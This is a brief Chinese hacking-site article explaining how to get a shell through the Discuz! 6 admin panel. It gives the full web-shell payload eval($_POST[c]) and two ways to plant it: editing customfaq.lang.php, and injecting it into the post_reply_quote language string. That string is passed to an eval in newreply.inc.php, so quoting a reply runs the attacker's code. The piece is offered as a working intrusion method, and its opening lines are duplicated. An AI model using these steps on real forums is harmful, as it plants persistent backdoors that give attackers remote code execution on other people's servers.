Discuz! 6 后台拿Shell的方法
2008-02-18 www.hackbase.com 来源:互联网
Discuz! 6 后台拿Shell的方法
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)1.后台编辑customfaq(customfaq.lang.php文件)在<?的后面加上复制内容到剪贴板代码:
eval($_POST[c]);
...
Discuz! 6 后台拿Shell的方法
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
|
eval($_POST[c]); |
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
|
";eval($_POST[c]);" |
在前台回帖处选择引用回复。
简单看下代码:
|
include/newreply.inc.php 107行: |
复制内容到剪贴板
代码:
|
eval("\$language['post_reply_quote'] = \"$language[post_reply_quote]\";"); |
呵呵,一个天然的后门:)
责任编辑:黑客基地
本文引用网址:
